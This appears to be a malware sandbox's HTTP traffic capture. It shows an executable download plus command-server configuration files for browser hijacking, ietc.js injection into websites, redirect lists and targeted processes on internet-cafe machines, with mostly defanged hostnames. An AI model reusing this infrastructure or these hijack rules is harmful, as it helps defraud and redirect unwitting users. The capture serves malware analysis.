Date: Sat, 24 Sep 2016 01:47:22 GMT
Content-Length: 136192
Content-Type: application/x-msdownload
Last-Modified: Wed, 21 Sep 2016 01:45:25 GMT
Accept-Ranges: bytes
ETag: "dc41e7d2a913d21:a652"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jinh93:2 (Cdn Cache Server V2.0), 1.1 jsycdx41:1 (Cdn Cache Server V2.0)
Connection: keep-alive
/9.20}}}y}}}..}a.c123}}}=}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}|}al|.<3.t.\.|1.\)....BA.....]......CSW....]..]92.A..UW.ppwY}}}}}}a......:...:...:.......:.......:...w. .:.......:.......:.....4.:..1....:../....:..1....:.......:..1....:./.....:.bc123}}}}}}}}}}a2&12.|~}...*}}}abc12.}.\v|v}}m.abs123..}..y}}..ab.523}}m}m}}}.}agc023}}}x}|}}}}ab.523m}}}}}}.}=`bc!23m}}}}m}}m}abc12#}}}..y}.}}ab.52K.}}}.y}}~}abc123}}}}}}}}}}af.52 }}}}}}}}}}abc123}}}}}}}}}}abc123}}}..y}5}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}(-%M}}}ab.323m}}}}}}}y}abc123}}}}}}}.}}.73i.3}}}}m.}}..abk323y}}}}}}}}}abc12s}}.S....}}abs123.y}}u}}}q.abc123}}}}}}}=}}.bc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}}}}}abc123}}}}}}NSMHa73i.>tsw..&<..8...52..|}}'y}[q}.x`1..........U..B...'.w.P.........L..i., .......l.J..U.[...&.c8.R.'..K..R.<.........Q.....B.....U{_. ..X..<..=.=4...z...R....A`P....uh.....8....-.,#.l..)..,.E.l.S.,..........8Xoh..0.[.|...e%}.m<.boy..... .....\Cd.cI]#..........F...z6.!I....8.)."...BD1.(.....zJ....?V.....u..T.....K....l..'..I.x.p...!.......Y....)...$s_?........u(......E0v 0.1.v..<.|.......%$......p.._.2i.8........!.:..8C.dj ......:..3..H.2..........>.S...h#|....%.....5.Z......;.F......0.y.4 .I..D.o.(B.3<^\.=...z.u.
<<< skipped >>>
GET /send/ico2safe.txt HTTP/1.1
User-Agent: RookIE/1.0
Host: yxtt.yswm.net
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 02:57:12 GMT
Content-Length: 58
Content-Type: text/plain
Last-Modified: Wed, 21 Sep 2016 02:27:29 GMT
Accept-Ranges: bytes
ETag: "988b87b3af13d21:a652"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc109:0 (Cdn Cache Server V2.0), 1.1 jinh95:0 (Cdn Cache Server V2.0)
Connection: keep-alive
@.....@hnrw*-......-@lhm*......@....999...@hnrw*-........-....
GET /send/ico2.txt HTTP/1.1
User-Agent: RookIE/1.0
Host: yxtt.yswm.net
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 03:15:23 GMT
Content-Length: 11304
Content-Type: text/plain
Last-Modified: Wed, 21 Sep 2016 03:13:30 GMT
Accept-Ranges: bytes
ETag: "d0bbba20b613d21:a652"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 chdx113:4 (Cdn Cache Server V2.0), 1.1 jinh94:3 (Cdn Cache Server V2.0)
Connection: keep-alive
........^hXXp://VVV.yaojyw.net/hnyx/yxsix.html^3..........^hXXp://VVV.yaojyw.net/hnyx/yxsix.html^3............^hXXp://VVV.yaojyw.net/hnyx/yxfour.html^3............^hXXp://VVV.yaojyw.net/hnyx/yxfour.html^3......^hXXp://VVV.yaojyw.net/hnyx/yxsix.html^3........^hXXp://VVV.yaojyw.net/hnyx/yxfour.html^3............1.76....^hXXp://VVV.168wm.net/zbjc2/index.htm^3..........^hXXp://VVV.168wm.net/zbjc1/index.htm^3........^http://VVV.168wm.net/zbjc1/index.htm^3..........^hXXp://VVV.168wm.net/zbjc1/index.htm^3........-........3D^hXXp://VVV.168wm.net/zbjc1/index.htm^3......88..^hXXp://VVV.168wm.net/zbjc2/index.htm^3..........^hXXp://www.168wm.net/zbjc1/index.htm^3......10000..^hXXp://VVV.168wm.net/zbjc2/index.htm^3..............^hXXp://VVV.168wm.net/zbjc2/index.htm^3......................^hXXp://VVV.168wm.net/zbjc1/index.htm^3..........^http://VVV.168wm.net/zbjc1/index.htm^3..........^hXXp://VVV.168wm.net/zbjc1/index.htm^3....boss..SS......^hXXp://VVV.168wm.net/zbjc2/index.htm^3....................^hXXp://VVV.168wm.net/zbjc2/index.htm^3............ ..........^hXXp://VVV.168wm.net/zbjc2/index.htm^3.......... ..........^hXXp://VVV.168wm.net/zbjc2/index.htm^3..xy........^hXXp://VVV.168wm.net/zbjc2/index.htm^3................^hXXp://VVV.168wm.net/zbjc2/index.htm^3............999......^hXXp://VVV.168wm.net/zbjc2/index.htm^3..............^hXXp://VVV.168wm.net/zbjc2/index.htm^3..........^hXXp://VVV.168wm.net/zbjc2/index.htm^3....................^hXXp://VVV.168wm.net/zbjc2/index.htm^3........100%....^hXXp://VVV.168wm.net/zbjc2/in
<<< skipped >>>
GET /send/serList.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 15:03:22 GMT
Content-Length: 1521
Content-Type: text/plain
Last-Modified: Wed, 03 Aug 2016 02:32:29 GMT
Accept-Ranges: bytes
ETag: "58decd472fedd11:a470"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jinh93:3 (Cdn Cache Server V2.0), 1.1 jinh94:2 (Cdn Cache Server V2.0)
Connection: keep-alive
..................@................@........ ..........@....................@2014............@............ - @.................... - @120.27.31.191@....9999..@....................@3D........@............@..........................@....................@............@....................OK........@............ @......................@......................@..........................................@1.76........@........................ @....................@....................@.................. -@...................... -@................................@.............. -@................@..................................@..................@........................@............X....@........-........@..........-................@........12..17............@....................@..................boss@................@........................@....-..................@.............1.85................................@...........n........................@........................@..............@3..5..15..00..............@3........-QQ............-........@..15..30........ ............-............-........ @3......-................-........@................_........@....3D....................@....................@................@........................@..........................@..................................@................................@..........3D........@........ - ........@........ ........-........@............................@120.27.31.191/page@.................. - 7..26........................
<<< skipped >>>
GET /send/pubjc.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 19:05:00 GMT
Content-Length: 147285
Content-Type: text/plain
Last-Modified: Fri, 23 Sep 2016 07:01:44 GMT
Accept-Ranges: bytes
ETag: "f4cbe586815d21:a652"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 chdx113:10 (Cdn Cache Server V2.0), 1.1 jinh95:5 (Cdn Cache Server V2.0)
Connection: keep-alive
.2345mini.com/sogou123/371325^2^hXXp://VVV.v136.net/sy/^^60^^...2345.com/?kz00966p^2^hXXp://VVV.v136.net/sy/^^60^^..2kiss.minibu8.com^2^http://VVV.v136.net/url^^60^^...w1258.com:^2^hXXp://VVV.v136.net/url^^60^^..j.88817973.cn^2^hXXp://VVV.v136.net/url^^60^^...koolmy.com^2^hXXp://VVV.v136.net/qp^^60^^...xh0222.com^2^hXXp://VVV.v136.net/qp^^60^^...vip45088.com^2^hXXp://VVV.v136.net/qp^^60^^...qvodik.com^2^hXXp://VVV.v136.net/qp^^60^^..80.kmay89.com^2^hXXp://VVV.v136.net/qp^^60^^...qy223.com^2^hXXp://VVV.v136.net/qp^^60^^...67365c.com^2^hXXp://VVV.v136.net/qp^^60^^...hlfvip2.com^2^hXXp://VVV.v136.net/qp^^60^^...g678929.com^2^hXXp://VVV.v136.net/qp^^60^^...jkgame1705.com^2^hXXp://VVV.v136.net/qp^^60^^...2345.com/?kb9999^2^hXXp://VVV.v136.net/sy/^^60^^...2345.com/?ka00001p^2^hXXp://VVV.v136.net/sy/^^60^^...hao123.com/?tn=95235957_hao_pg^2^hXXp://VVV.v136.net/sy2/^^60^^..vv.85yi.com^2^hXXp://VVV.v136.net/url^^60^^..aaa.cn8886.com^2^hXXp://VVV.v136.net/url^^60^^..bmw.37gf.com^2^hXXp://VVV.v136.net/url^^60^^..pm.5zdn.com/31^2^hXXp://VVV.v136.net/url^^60^^..pc.zc-wan.com^2^hXXp://VVV.v136.net/qp^^60^^..pc.playerzc.com^2^hXXp://VVV.v136.net/qp^^60^^...08098.com^2^hXXp://VVV.v136.net/qp^^60^^...70888n.com^2^hXXp://VVV.v136.net/qp^^60^^...yz900.com^2^http://VVV.v136.net/qp^^60^^..2345n.sogoulp.com/index16781983_1.html^2^hXXp://VVV.v136.net/sy/^^60^^..123.sogoulp.com/index16782843_1.html^2^hXXp://VVV.v136.net/sy/^^60^^...2345.com/?kz00232p^2^hXXp://VVV.v136.net/sy/^^60^^...2345.com/?kz00850p^2^hXXp://VVV.v136.net/sy/^^60^^.
<<< skipped >>>
GET /send/exitpop.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 17:21:04 GMT
Content-Length: 572
Content-Type: text/plain
Last-Modified: Mon, 01 Feb 2016 14:47:23 GMT
Accept-Ranges: bytes
ETag: "d479c675ff5cd11:a652"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 chdx113:5 (Cdn Cache Server V2.0), 1.1 jinh94:4 (Cdn Cache Server V2.0)
Connection: keep-alive
[push]..time=5..user=..BaiduClose=..RightClose=..QQClose=..HtcClose=..UrlClose=..JyClose=..TcClose=..DhClose=jingwang@heze..RndClose=..BaiduJcClose=..DhUrl=hXXp://123.sogou.com/?af71105-0003..[pushurl1]..url=http://VVV.168wm.net/pro/index.htm..[url1]..user=..1=VVV.baidu.com..2=wd=..3=pn=..ep=1..url=....[url2]..user=..1=hXXp://VVV.sina.com.cn/..ep=1..url=..[url3]..user=..1=VVV.sogou.com..2=query=..3=page=..ep=1..url=....[url4]..user=..1=VVV.17173.com..ep=1..url=....[url5]..user=..1=user.qzone.qq.com..ep=1..url=..[url6]..user=..1=bbs.yoka.com..ep=1..url=....
GET /send/yxjk/yxjpq.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 15:37:47 GMT
Content-Length: 588
Content-Type: text/plain
Last-Modified: Tue, 30 Aug 2016 03:31:31 GMT
Accept-Ranges: bytes
ETag: "44ce4806f2d21:a4e7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc109:2 (Cdn Cache Server V2.0), 1.1 jinh95:1 (Cdn Cache Server V2.0)
Connection: keep-alive
hnrwdong*skin_lol/html/index.html@xyq.163.com/client/15v1.html@072008.cn@fanxing.kugou.com@110060063@906081@907810@905899@907811@116940004@?js7704@bobo.com@game485.com@3gmax.cn@id=M123158@7fgame.com@dnf.tga.plu.cn/qqtips?isingame@.23kmm.com/htmlcode/227@placeid=227@.23kmm.com/htmlcode/218@placeid=218@.5599.com@0045002000001@?m=yw207&sss@?m=yw207&sss@?m=tubiao113&sss@0045002500000@tgp.qq.com@igame.qq.com@5211game.com@.pc918.net@.yswm.net@pubwin*.hao123.com@pubwin*.baidu.com@pubwin*sogou.com@907046@.yy.com@iframe.huya.com@VVV.mvpcp.com@.37.com@.feitian001.com@.feitian.com@.fookea.com....
GET /send/eb.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 20:08:36 GMT
Content-Length: 13363
Content-Type: text/plain
Last-Modified: Fri, 12 Dec 2014 08:31:01 GMT
Accept-Ranges: bytes
ETag: "f23f69f6e515d01:a55b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc109:4 (Cdn Cache Server V2.0), 1.1 jinh95:6 (Cdn Cache Server V2.0)
Connection: keep-alive
user.qzone.qq.com^17^^10..item.taobao.com^17^^10..favorite.taobao.com^17^^10..shoucang.taobao.com^17^^10..VVV.taobao.com^17^^10..ju.taobao.com^17^^10..taobao.com/search?^17^^10..trade.taobao.com^17^^10...tmall.com/item.htm^17^^10..list.tmall.com/search^17^^10..VVV.tmall.com^17^^10...jd.com^7^^400...7cv.com^7^^400..ctrip.com^7^^400..ctrip.com^7^^400..7daysinn.cn^7^^400...vip.com^7^^400..pb89.com^7^^400..yougou.com^7^^400..nuomi.com^7^^400..xiangshe.com^7^^400..xiangguo.tv^7^^400..blzoom.com^7^^400..paixie.net^7^^400...lovo.cn^7^^400..wangjiu.com^7^^400..tiantian.com^7^^400..mbaobao.com^7^^400..aizhigu.com.cn^7^^400..redbaby.suning.com^7^^400..keede.com^7^^400..bookschina.com^7^^400..dangdang.com^7^^400..dhc.net.cn^7^^400..winxuan.com^7^^400..lefeng.com^7^^400...no5.com.cn^7^^400...jxdyf.com^7^^400...d1.com.cn^7^^400...newegg.cn^7^^400...xiu.com^7^^400...leyou.com.cn^7^^400...yidianda.com^7^^400...china-pub.com^7^^400...x.com.cn^7^^400...yhd.com^7^^400...quwan.com^7^^400...masamaso.com^7^^400...yohobuy.com^7^^400...vip.com^7^^400...winenice.com^7^^400...yesmywine.com^7^^400...chunshuitang.com^7^^400...vsigo.cn^7^^400...womai.com^7^^400...s.cn^7^^400...lamiu.com^7^^400..beifabook.com^7^^400...pb89.com^7^^400...m18.com^7^^400...oohdear.com^7^^400...yixun.com^7^^400...happigo.com^7^^400...tiantian.com^7^^400...justyle.com^7^^400...suning.com^7^^400..muyingzhijia.com^7^^400...hecha.cn^7^^400...e-lining.com^7^^400..xifuquan.com^7^^400..paixie.net^7^^400..vjia.com^7^^400..lusen.com^7^^400..chris-tina.com^7^^400..shangp
<<< skipped >>>
GET /send/yxjk/jzyxj.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 14:38:20 GMT
Content-Length: 8416
Content-Type: text/plain
Last-Modified: Fri, 05 Aug 2016 02:27:44 GMT
Accept-Ranges: bytes
ETag: "48afbf2c0eed11:a470"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jinh92:6 (Cdn Cache Server V2.0), 1.1 jinh94:2 (Cdn Cache Server V2.0)
Connection: keep-alive
dev.tg.wan.360.cn^^^800002..360tg.6711.com^^^800002..g.b.twyxi.com^^^800002...i5399.com^^^800002..g.6gh4.com^^^800002..tg.xylhgw.com^^^800002..g.s8dj.com^^^800002..t.xydhl.com^^^800002..t.cyuew.com^^^800002..*..........^^^800002...13resy.com^^^800002...luxi0891.com^^^800002...wywgx.com^^^800002...5p0n.com^^^800002..bai880.9ok2016.com^^^800002..bai660.android882.com^^^800002...51korean.com^^^800002...a3t6.cn/08^^^800002..183.61.162.85^^^800002...3gg.com^^^800002...926aasf.com^^^800002...kkkggg.cn^^^800002..70803344.com^^^800002...g5h5.com/bd^^^800002..cls.d54p.com^^^800002...52sf-lsi.com^^^800002...myfirstweb.cn^^^800002..183.61.162.86^^^800002...hgjg12.com^^^800002...woaisf2016.com^^^800002...haha2016.com^^^800002..qo8.m3b3.com^^^800002..zd.91913.cn^^^800002..VVV.zhaocs.com^^^800002..bai123.q77169.com^^^800002...888ppk.cn^^^800002...7lph.com^^^800002..4gfbf.jghr11.com^^^800002...futusff8.com^^^800002..bai330.tel2016.com^^^800002...qubasfkf.com^^^800002...asf.baidu1.com^^^800002..4fvrh.11vfsa.com^^^800002..info.yitsoftware.com^^^800002...12hjfrg.com^^^800002..6ag.3loz.com^^^800002...sjh520.com^^^800002..VVV.uc48.com/08^^^800002..*..........^^^800002..*....1.76^^^800002..*..........^^^800002..*..........^^^800002..*........^^^800002..g.b28g.com^^^800002..VVV.4399.com^^^800002..wan.sogou.com/^^^800002..tg.51.com^^^800002..g.fd4f.com^^^800002..g.b28g.com^^^800002..sx.juygj.com^^^800002..*....PK^^^800002..*......boss^^^800002..*..........^^^800002..*80......^^^800002..*........^^^800002..*............^^^800002..*...
<<< skipped >>>
GET /send/tfgg.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 17:21:04 GMT
Content-Length: 454
Content-Type: text/plain
Last-Modified: Tue, 22 Mar 2016 02:15:19 GMT
Accept-Ranges: bytes
ETag: "144bbaaee083d11:a404"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jinh93:8103 (Cdn Cache Server V2.0), 1.1 jinh94:1 (Cdn Cache Server V2.0)
Connection: keep-alive
placeid=193...7977w.com/htmlcode/193..23kmm.com/htmlcode/227..placeid=227...23kmm.com/htmlcode/218..placeid=218..hXXp://pop.duoqu.com/lt.html__1__lt_002__253_1254_2__42.html..hXXp://VVV.xingbo.tv/burning?chan=28..hXXp://VVV.xingbo.tv/burning?chan=80..tubiao113..hXXp://VVV.game485.com/agrt.html?id=300680&p..hXXp://VVV.game485.com/agrt.html?id=153521&p=i..907046..907811..906081..907810..120435..xuanchuanyiunion.cpm..fzcg.zhengheinc.com..90360772_hao_pgHTTP/1.1 200 OK..Date: Sat, 24 Sep 2016 17:21:04 GMT..Content-Length: 454..Content-Type: text/plain..Last-Modified: Tue, 22 Mar 2016 02:15:19 GMT..Accept-Ranges: bytes..ETag: "144bbaaee083d11:a404"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Age: 1..X-Cache: HIT from cache.51cdn.com..X-Via: 1.1 jinh93:8103 (Cdn Cache Server V2.0), 1.1 jinh94:1 (Cdn Cache Server V2.0)..Connection: keep-alive..placeid=193...7977w.com/htmlcode/193..23kmm.com/htmlcode/227..placeid=227...23kmm.com/htmlcode/218..placeid=218..hXXp://pop.duoqu.com/lt.html__1__lt_002__253_1254_2__42.html..hXXp://VVV.xingbo.tv/burning?chan=28..hXXp://VVV.xingbo.tv/burning?chan=80..tubiao113..http://VVV.game485.com/agrt.html?id=300680&p..hXXp://VVV.game485.com/agrt.html?id=153521&p=i..907046..907811..906081..907810..120435..xuanchuanyiunion.cpm..fzcg.zhengheinc.com..90360772_hao_pg....
<<< skipped >>>
GET /send/prosafe.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 15:28:17 GMT
Content-Length: 845
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2016 03:19:29 GMT
Accept-Ranges: bytes
ETag: "c8f02e2c7ff3d11:a470"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc108:4 (Cdn Cache Server V2.0), 1.1 jinh95:1 (Cdn Cache Server V2.0)
Connection: keep-alive
hintplugin.exe@*hintplugin.exe@rzxcline.exe@rzxmon.exe@rzxsvc.exe@rwyclient.exe@rwyncmc.exe@svchost.exe@wcsadenr.exe@*clsmn.exe@gamelauncher.exe@netbarplayer.exe@skyrfilm.exe@rocalres.exe@*coobarclt.exe@*crossfire.exe@\................\@\......\hqg.exe@\matchlobby.exe@hdzy.exe@ltlogger.exe@......online......@\xmp\program\xpm.exe@\pstyle\qyclient.exe@\........2......\@\..............\launcher\launcher.exe@nbms.exe@jknbms.exe@cycslogin.exe@........\....\autoupdate.exe@\........\cqby.exe@welcome.exe@launch.exe@\........\qkwebgamelogin.exe@\debug\explorer.exe@whclient\whwindow.exe@\....\gamelaunch.exe@9377.............exe@*\tklobby.exe@\tkwebapp.exe@\tkcltnet.exe@\tkassistor.exe@\tklobby.exe@\jjgame\@\JJ......\@\gamemenu\bin@hintclient.exe@*temp\temp\system.exe@*\Temp\Temp\@7fgame.exe@lshdw.exe@yy.exe@yygame.exe@\........\@xy2_launch.exe....
GET /send/addjs/jslist.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 13:30:20 GMT
Content-Length: 7956
Content-Type: text/plain
Last-Modified: Mon, 05 Sep 2016 01:23:27 GMT
Accept-Ranges: bytes
ETag: "f6816a1a147d21:a4e7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc108:3 (Cdn Cache Server V2.0), 1.1 jinh95:6 (Cdn Cache Server V2.0)
Connection: keep-alive
.xieedang123.com^^^hzuser@servce@hnrw@wskh^0^ietc.js..xieguotou.com^^^hzuser@servce@hnrw@wskh^0^ietc.js...zhainandao.com^^^hzuser@servce@hnrw@wskh^0^ietc.js...mm131.com^^^hzuser@servce@hnrw@wskh^0^ietc.js...laonanren.com^^^hzuser@servce@hnrw@wskh^0^ietc.js...laogedaojie.com^^^hzuser@servce@hnrw@wskh^0^ietc.js...colorbird.com^^^hzuser@servce@hnrw@wskh^0^ietc.js...5442.com^^^hzuser@servce@hnrw@wskh^0^ietc.js...52kkm.org^^^hzuser@servce@hnrw@wskh^0^ietc.js...169bb.com^^^hzuser@servce@hnrw@wskh^0^ietc.js..m.neihancun.net^^^hzuser@servce@hnrw@wskh^0^ietc.js...xieedang123.com^^^hzuser@servce@hnrw@wskh^0^ietc.js..rb.yesemn.com^^^hzuser@servce@hnrw@wskh^0^ietc.js...5442.com^^^hzuser@servce@hnrw@wskh^0^ietc.js...xmeise.com^^^hzuser@servce@hnrw@wskh^0^ietc.js...xieedang123.com^^^hzuser@servce@hnrw@wskh^0^ietc.js...ik123.com^^^hzuser@servce@hnrw@wskh^0^ietc.js...a4yy.com^^^hzuser@servce@hnrw@wskh^0^ietc.js..tuku.nvsay.com^^^hzuser@servce@hnrw@wskh^0^ietc.js..static.yungengxin.com^^^hzuser@servce@hnrw@wskh^0^ietc.js..mp.weixin.qq.com/s?^^^hzuser@servce@hnrw@wskh^0^ietc.js..pubapi.yungengxin.com^^^hzuser@servce@hnrw@wskh^0^ietc.js..VVV.yy6080.tv^^^hzuser@servce@hnrw@wskh^0^ietc.js..www.yy6080.org^^^hzuser@servce@hnrw@wskh^0^ietc.js..VVV.dytt8.net^^^hzuser@servce@hnrw@wskh^0^ietc.js..VVV.80s.cn^^^hzuser@servce@hnrw@wskh^0^ietc.js..qqsix.com.cn^^^hzuser@servce@hnrw@wskh^0^ietc.js..VVV.qzone520.com^^^hzuser@servce@hnrw@wskh^0^ietc.js..VVV.iqshw.com^^^hzuser@servce@hnrw@wskh^0^ietc.js..mm.xmeise.com^^^hzuser@servce@hnrw@wskh^0^
<<< skipped >>>
GET /send/jzjc/jzjc.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 17:21:04 GMT
Content-Length: 154
Content-Type: text/plain
Last-Modified: Thu, 25 Feb 2016 08:27:14 GMT
Accept-Ranges: bytes
ETag: "a2b9ca54a66fd11:a413"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jsyc109:8104 (Cdn Cache Server V2.0), 1.1 jinh94:3 (Cdn Cache Server V2.0)
Connection: keep-alive
tgp_render.exe^..gamelauncher.exe^..\qq.exe^..runme.exe^..clsmn.exe^..wxlltaidex.exe^..pubwinclient.exe^..svchost.exe^..jknbmsnew.exe^..barblientview.exe^....
GET /send/jzjc/jzurl.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 17:21:04 GMT
Content-Length: 1224
Content-Type: text/plain
Last-Modified: Tue, 01 Mar 2016 02:42:45 GMT
Accept-Ranges: bytes
ETag: "42ecb986473d11:a404"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 1
X-Cache: HIT from cache.51cdn.com
X-Via: 1.1 jinh92:8080 (Cdn Cache Server V2.0), 1.1 jinh94:6 (Cdn Cache Server V2.0)
Connection: keep-alive
^^.16mncr5.cn/2016/^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10..^^.xlmqt.com^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10..^^.vs858.com^http://VVV.168wm.net/jzurljc/index.htm^3^10..^^p.m5bn.com/1/1265.html?uid=3252^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10..^^.1x3x.com/z/bin056gjsg2ico26^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10..^^.jielesh.com^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10..^^up.zhuiqu.com/html^http://VVV.168wm.net/jzurljc/index.htm^3^10..^^t2.e719.net/g_20140331.asp?u^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10..^^news.a9377j.com/1869/?gid^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10..^^w.lj139.com/dxt/21417^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10..^^11.800tx.com^http://VVV.168wm.net/jzurljc/index.htm^3^10..^^bdtg.37wanyy.cn/s/1/1317/44985.html?uid=2390762^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10..^^g.6sfg.com/s/1/999/33990.html?uid=507162^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10..^^121.40.32.124:^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10..^^777sf.ykski.com^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10..^^p.pp1o.com/s/1/1222/39228.html?uid=908833^hXXp://VVV.168wm.net/jzurljc/index.htm^3^10..^^p.pp1o.com/s/1/1222/32215.html?uid=906636^hXXp://www.168wm.net/jzurljc/index.htm^3^10....
<<< skipped >>>
GET /send/newDomain.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yxtt.v138.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 24 Sep 2016 15:23:19 GMT
Content-Length: 21
Content-Type: text/plain
Last-Modified: Fri, 24 Jun 2016 03:06:00 GMT
